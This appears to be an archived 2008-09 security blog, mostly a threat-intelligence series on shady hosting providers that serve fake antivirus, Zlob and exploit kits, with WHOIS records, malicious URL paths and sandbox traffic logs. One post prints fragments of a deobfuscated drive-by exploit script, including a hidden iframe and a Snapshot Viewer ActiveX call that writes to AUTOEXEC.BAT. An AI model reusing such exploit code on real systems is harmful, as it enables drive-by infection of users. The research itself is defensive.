Posted by: realsecurity | April 16, 2009

Moving Hosts

I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a account as a trial and I’ve been very pleasantly surprised by the feedback and interest the blog has received. So to get more flexibility I’ve moved to a proper webhost. The blog will be in a bit of a state of flux as I transition to . Stay tuned.

Posted by: realsecurity | March 14, 2009

Social Security Awards

Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say,  I would appreciate your votes in the Best Technical Security Blog area.

Vote here:

I shall resume regular updates in May upon my return!

Posted by: realsecurity | January 29, 2009

Mobile Device Forensics

While catching up on security news in an internet cafe in Buenos Aires, I came upon the news that the newly elected US president Barak Obama is going to be the first president to use a blackberry.


With there being some buzz around blackberry security, it’s a good time to mention the paper I wrote for SANS on mobile device forensics.

It can be found at:

The paper covers how to investigate a cellular phone (Motorola Razr), smartphone (blackberry) and MP3 player to gather information, recover deleted data, etc.

Posted by: realsecurity | January 7, 2009

Taking some time off

Since we normally only live once, I’ve decided to take an extended vacation.  Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I’ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America.

Maybe I’ll post some photos along the way to make all my readers jealous 🙂

Happy hunting,


Posted by: realsecurity | December 22, 2008

Sources of Badness – Still Trade LTD

The absolute worst culprit that I’ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here.

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: 20080624
source: RIPE

Still Trade hosts a ton of fake/rogue anti virus domains and applications. We’ve seen these hosts pop up recently:
2008-12-01 /setup/setup.exe – Fake AV

2008-12-11 /cd/650/1749/wmpcdcs.exe – Zlob

2008-12-03 /cd/650/1663/wmpcdcs.exe – Zlob

Same as above

The following IPs are associated with malicious applications:

BISS also has a comprehensive list of domains and malware being served by these guys.

Posted by: realsecurity | December 17, 2008

Sources of Badness – Starline Web Services

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C as reported by Fireeye.

inetnum: -
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed: 20080403
source:         RIPE

The Yahoo article has lots of great information on the relationship between Starline and it’s upstream providers, so I won’t delve into that here.

Here are the hits I’ve seen from their IP space: –
2008-11-05 /load.php

2008-11-12 /cache/doc.pdf

2008-11-22 /cache/doc.pdf
2008-10-24 /zpl/pdf.php
2008-10-30 /eez3a893/spl/pdf.pdf

2008-11-26 /u8899r5v/spl/pdf.pdf

2008-12-17 /yg6cv7ar/spl/pdf.pdf
2008-09-18 /1/
2008-09-17 /1/

There’s quite a history here. From the looks of things, someone has been
moving around their malware from domain to domain on All
of these sites are down as of this writing except Lets dive
further into this site.

The first page I saw was /yg6cv7ar/spl/pdf.pdf however
this is not the whole story. When investigating that exact URL, pdf.pdf
is not found. This is curious as I saw the site earlier today. Backing up
to the root of, we get an index page. The index page contains
an iframe that points to a different directory. The malware author must
have coded his site to rotate directory names based on a certain criteria.
This makes investigation difficult if you can’t figure out where it will
send victims to next.

The next iframe I got contained:


The next page that comes into play is the exploit script index.php which
is detected as:


Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and
the Microsoft Access Snapshot viewer. Here’s some of the script:

var p_url = “”;
function MDAC(){

var nuc=”;
d8= 0;
var koSZV = document.createElement(“o”+nuc+”b”+nuc+”je”+nuc+”c”+nuc+”t”);
function PDF()
document.write(‘<iframe src=”spl/pdf.pdf” width=1 height=1 style=”display:none”></iframe>’);
function SS()
var arbitrary_file = p_url;
var dest = ‘C:/AUTOEXEC.BAT’;
document.write(“<object classid=’clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9′ id=’attack’></object>”);
if (MDAC()||PDF()||SS()) { }

Detections for the malicious pdf:


The payload is a file called ztt.php, here are a few of the detections:


A quick submission to Threat Expert (report) and Anubis (report) reveal
further binaries that are downloaded. The .dat files are not exes, but a
type of binary data file.

From ANUBIS:1033 to – []
Request: GET /flo/zro.dat
Response: 200 “OK”
Request: GET /flo/mp.dat
Response: 200 “OK”
Request: GET /flo/3rkour.dat
Response: 200 “OK”

Of particular interest is, another Latvian host with a
small /24 network. Might be worth keeping your eyes open for them too.

inetnum: -
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT
From ANUBIS:1036 to – []
Request: GET /myfiles/95/139/file.exe
Response: 200 “OK”
From ANUBIS:1037 to – []
Request: GET /files/20026.exe
Response: 200 “OK”

Some detections for 20026.exe, and file.exe:



The FakeAlert signatures are correct, the threat ultimatly installs some
fake anti virus / anti spyware application.


Posted by: realsecurity | December 16, 2008

Sources of Badness – PortNAP

One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We’ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP –

inetnum: -
netname:        GFX-CUST-PORTNAP
descr:          PortNAP Internet Services
org:            ORG-PIS13-RIPE
country:        NL
admin-c:        GFX-RIPE
tech-c:         GFX-RIPE
status:         ASSIGNED PA
mnt-by:         GFX-MNT
changed: 20081021
source:         RIPE
abuse-mailbox: 2008-12-02 – site down /2009/download/trial/A9installer_880473.exe 2008-12-02 – site down /download/trial/AV360Install_77014205.exe
2008-11-20 – site down /2009/download/trial/A9installer_880290.exe

Posted by: realsecurity | December 15, 2008

Sources of Badness – ZlKon

After a weekend hiatus, I’m back with the next host of interest – ZlKon.

role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:          +371 26330593
admin-c:        AD5952-RIPE
tech-c:         AD5952-RIPE
nic-hdl:        ZK508-RIPE
mnt-by:         ZLKON-MNT
changed: 20081125
source:         RIPE

Based in Latvia, Zlkon seems to have a high ratio of bad IPs to it’s small
address space. A customer of the larger DATORU EXPRESS SERVISS, Zlkon
has two /24s –

% Information related to ''

descr:          "DATORU EXPRESS SERVISS" Ltd.
origin:         AS12553
mnt-by:         PCEXPRESS-MNT
changed: 20081121
source:         RIPE
2008-12-02 – not accessible /2009/download/trial/A9installer_880135.exe
2008-12-09 /download/Keygen.Image.for.DOS.2.08c3098.exe

2008-12-02 /download/windows311megaupload_3019.exe
Same as above

2008-12-12 /download/moonmovie.v.3.484.exe
Same as above
2008-11-27 – not accessible
antivirus– /installer_00004.exe
2008-12-02 – not accessible
2008-12-02 – not accessible

2008-12-12 /MCLiteodecVer.6.20467.exe
Same as below

2008-12-13 /MCLiteodecVer.6.20271.exe
2008-12-03 – not accessible /2009/download/trial/A9installer_880147.exe
2008-12-14 /exclusivemovie.1518.exe

So we’ve got some fake antivirus, Renos, zlob, etc. Nothing overly terrible like a banking trojan or spam bot but who knows what else is being hosted in Zlkon’s address space.

Posted by: realsecurity | December 12, 2008

Sources of Badness – UATelecom

The next source of badness I’ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about here (written in German)

netname: BASTION-NET
descr: ISP UATelecom
country: EU
organisation: ORG-TG39-RIPE
org-name: UATELECOM LLC.
org-type: OTHER
address: Ukraine, Voznesensk, Lenina 52
remarks: ————————-
phone: +38-048-701-05-45
phone: +38-096-380-13-21
phone: +38-096-380-13-26
fax-no: +38-048-701-05-45
remarks: ————————-

We’ve seen lots of malware from their netblock:    2008-10-30 – site down    /mix/xcvb.pdf    2008-12-09 – site down    /2009/download/trial/InstallAVv_880460.exe    2008-12-02    /get/1xxx5912940/download.exe

Troj/Zlob-AOX    2008-12-02    /WinDefender2009.exe – fake AV

AntiVirus2008.AIJ    2008-12-03 (more on this below)    /spl/load.php – SPAM Bot


load.php (an exe) is downloaded from the index of /spl/. The exploit code has 2/38 detections, JS:Packed-X    2008-12-03 – site down    /2009/download/trial/A9installertest_880135.exe    2008-11-27 – sites down    /k-codec.335.exe
2008-12-02    /moviecodec.91.exe
2008-12-04    /moviecodec.136.exe

Since drops a SPAM bot I decided to dig a little deeper. When infected, the bot first calls home via a GET to

OrgName:    SoftLayer Technologies Inc.
OrgID:      SOFTL
Address:    1950 N Stemmons Freeway
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US

GET /40E8001430303030303030303030303030303030303031306C00000
1A366000000007600000642EB00053098A9B3BE HTTP/1.0

HTTP/1.0 200 OK
Date: Fri, 12 Dec 2008 16:10:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 12 Dec 2008 16:10:22 GMT
Cache-Control: no-cache
Content-Length: 110604
Connection: close
Content-Type: application/octet-stream

The stream contains some sort of obfuscated payload. It then makes a bunch of DNS requests to various smtp servers and starts to send spam. There is also a side channel of some sort that it establishes to over port 2065.

OrgID:      HVC-3
Address:    400 N Tampa St
Address:    #1025
City:       Tampa
StateProv:  FL
PostalCode: 33602
Country:    US

This traffic also seems obfuscated with the only readable string below:


From doing a little digigng, this threat really is Pushdo/Cutwail. It’s interesting that the exploit site is hosted in the Ukraine, but the C&Cs are located in the US.

Fireeye article
Secure Works article

Happy hunting!

Posted by: realsecurity | December 11, 2008

Sources of Badness – LeaseWeb

**Edit 2**

I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of notifying hosts is not effective. If more organizations would take the time to investigate the sites attacking them and provide detailed evidence, the whole community will prosper.

**Edit** Seems this post has already drummed up some interest from several parties.

Let me just start by saying that I am not advocating that any of the hosts discussed here be knocked off the internet. Some people are all for shutting down hosting providers that host a lot of malware, others are not. The aim of this series of posts is to inform the public that there are some other hosts out there worth taking a look at.

Is all of LeaseWeb’s /16 AS bad? Of course not. Do they have a bunch of nefarious customers purchasing service from them? It certainly looks that way, I’m sure policing such a large address space has it’s challenges.

The more people that know where the badness comes from, the better. If there is a case to take down a host, that case comes from the community.


Given the recent interest in web hosts such as MCCOLO and the success that security researchers have achieved in taking them down, I decided to look for others. Over the next several days I will post details on some shady web hosts from various parts of the world. This is by no means a definitive list, it is just a start. Hopefully others in the community will go check their logs/IDS and find more information.

If I had more hosts, maybe I could call this series of articles “The week of shady web hosts” 🙂
Today’s host is AS16265 LeaseWeb AS Amsterdam, Netherlands.

netname:        LEASEWEB
descr:          LeaseWeb
descr:          P.O. Box 93054
descr:          1090BB AMSTERDAM
descr:          Netherlands
remarks:        Please send email to "" for complaints
remarks:        regarding portscans, DoS attacks and spam.
remarks:        INFRA-AW
country:        NL
admin-c:        LSW1-RIPE
tech-c:         LSW1-RIPE
status:         ASSIGNED PA
mnt-by:         OCOM-MNT
changed: 20071015
source:         RIPE

Information related to ''

descr:          LEASEWEB
origin:         AS16265
remarks:        LeaseWeb
mnt-by:         OCOM-MNT
changed: 20050311
changed: 20070610
source:         RIPE

We’ve got exploits and hostile payloads from several IPs in their ranges.
I haven’t had a chance to get virus total results however. - - - -

IP              Date       Domain/IP            URL   2008-12-08		/xrun.tmp (exe payload)
                2008-11-06	/data.pdf (exploit)	2008-12-01	/stat/index.htm (exploit)	2008-12-09	/downloadsetupws.php (exe payload)	2008-10-14	/n_fia/pdf.php (exploit)	2008-12-03	/74812/a.php (exe payload)

Xentronix network (LeaseWeb) -	2008-11-05	/css/pdf.php (exploit)	2008-09-19	/gtest2/pdf.php (exploit)	2008-10-15	/gtest2/pdf.php (exploit)

Older Posts »